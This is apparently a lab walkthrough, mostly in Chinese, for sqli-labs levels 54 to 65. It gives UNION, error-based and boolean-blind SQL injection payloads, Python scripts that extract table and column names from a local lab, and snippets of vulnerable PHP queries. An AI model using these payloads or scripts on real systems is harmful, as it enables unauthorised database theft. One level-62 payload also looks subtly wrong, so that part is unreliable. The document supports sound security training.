
sqli-labs5

54


id=0' and 1=1 union select 1,2,3 --+


id=0' and 1=1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),3 --+

dbs challenges

table qpu4f7zhcb

columns sessid,secret_6KIK,tryy


id=0' and 1=1 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='qpu4f7zhcb'),3 --+


id=0' and 1=1 union select 1,(select sessid from qpu4f7zhcb limit 0,1),(select secret_6KIK from qpu4f7zhcb limit 0,1) --+



55

)闭合

http://127.0.0.1/sqli-labs/Less-55/?id=0) union select 1,database(),3 --+

?id=0) union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),3--+

?id=0) union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='8bgb8hj1sk'),3 --+

secret_MCQ1

id=0) union select 1,(select sessid from 8bgb8hj1sk limit 0,1),(select secret_MCQ1 from 8bgb8hj1sk limit 0,1) --+


56

')闭合 方法还是一样的


57

?id=-1" union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3--+


58

使用?id=1 and 1=1 union select 1,2,3无回显

尝试报错注入

?id=0' and updatexml(1,concat(0x7e,database(),0x7e),1)--+

?id=0' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)--+

?id=0' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='y0584eq2pg'),0x7e),1)--+

?id=0' and updatexml(1,concat(0x7e,(select group_concat(secret_5U2L) from y0584eq2pg),0x7e),1)--+


59

数字型 和58一样

?id=0 and updatexml(1,concat(0x7e,database(),0x7e),1)--+


60

")闭合 和58一样


61

'))闭合

?id=0')) and updatexml(1,concat(0x7e,database(),0x7e),1)--+


62

')闭合 这关没回显 使用时间盲注

根据前面几关可以得到

数据库为 challenges

table 是随机10位字符组成

column是secret_ 和四位随机字符组成

本关限制重置次数为130次,可以写个python脚本试一下



?id=1') and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{i},1))>{m}--+

?id=1') and ascii(substr((select group_concat(column_name) from information_schema.tables where table_schema=database() and table_name='8mdr4weo2b'),{i},1))>{m}--+


# Recover the table name (Less-62, boolean-based blind injection)
"""Lab walkthrough script for sqli-labs Less-62.

The lab page gives no direct output, so a page-content oracle is used:
the string 'Angelina' is present on the normal page and absent when the
appended condition is false.  Note that the oracle is page content, not a
time delay.  Each character is bisected over a 62-entry candidate list,
so roughly six requests per character are needed; with a known length of
ten characters the whole run stays well inside the 130-attempt reset
limit the lab imposes.

Detection note for defenders: the traffic this produces is a burst of
near-identical GETs to one URL whose query strings differ only in the
``{i}`` and ``{m}`` comparands -- a pattern that is easy to key on in
access logs or a WAF rule.
"""
import requests

url = 'http://127.0.0.1/sqli-labs/Less-62/'

data = ''

# Candidate ASCII codes: '0'-'9', 'A'-'Z', 'a'-'z' (62 entries, indices 0..61).
payloads = list(range(48, 58)) + list(range(65, 91)) + list(range(97, 123))

for i in range(1, 11):  # the table name is known to be 10 characters long
    lo, hi = 0, 61
    # Bisect on the candidate list: 'lo' moves up while the oracle says the
    # character is greater than the probe value, otherwise 'hi' moves down.
    while hi - lo > 1:
        mid = (lo + hi) // 2
        m = payloads[mid]
        payload = f"?id=1') and ascii(substr((select group_concat(table_name) from " \
                  f"information_schema.tables where table_schema=database()),{i},1))>{m}--+"
        resp = requests.get(url + payload)
        if 'Angelina' in resp.text:  # 'Angelina' is the normal-page marker
            lo = mid
        else:
            hi = mid
    data += chr(payloads[hi])

print(data)




# Recover the secret column name (Less-62, boolean-based blind injection)
"""Lab walkthrough script for sqli-labs Less-62, second stage.

Same page-content oracle as the table-name stage ('Angelina' present on
the normal page, absent otherwise).  The column is known to have the form
``secret_XXXX``, so only positions 8..11 are bisected; the fixed prefix is
re-attached on output.  The probe reads the third column of the table
(``limit 2,1``) from information_schema.columns.

Detection note for defenders: as with the previous stage, this is a short
burst of GETs to one URL differing only in two numeric comparands.
"""
import requests

url = 'http://127.0.0.1/sqli-labs/Less-62/'

data = ''

# Candidate ASCII codes: '0'-'9', 'A'-'Z', 'a'-'z' (62 entries, indices 0..61).
payloads = list(range(48, 58)) + list(range(65, 91)) + list(range(97, 123))

# Only the four random characters after 'secret_' are unknown.
for i in range(8, 12):
    lo, hi = 0, 61
    # Bisect on the candidate list using the page-content oracle.
    while hi - lo > 1:
        mid = (lo + hi) // 2
        m = payloads[mid]
        payload = f"?id=1') and ascii(substr((select column_name from " \
                  f"information_schema.columns where table_name='eu3ls8m6rg' limit 2,1),{i},1))>{m}--+"
        resp = requests.get(url + payload)
        if 'Angelina' in resp.text:
            lo = mid
        else:
            hi = mid
    data += chr(payloads[hi])

print('secret_' + data)



63

// Less-63 source: $id is interpolated straight into a single-quoted literal
// inside the query string; this unparameterised concatenation is the
// injection point the lesson exercises (a prepared statement would close it).
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";

方法同62


64

// Less-64 source: $id is interpolated unquoted inside a double pair of
// parentheses; the value is still concatenated into the SQL text rather than
// bound, so the injection point is unchanged, only the closing syntax differs.
$sql="SELECT * FROM security.users WHERE id=(($id)) LIMIT 0,1";

方法同62


65

// Less-65 source: $id is interpolated unquoted inside a single pair of
// parentheses; as in the previous two lessons the value is concatenated into
// the SQL text, not bound as a parameter.
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";

方法同62
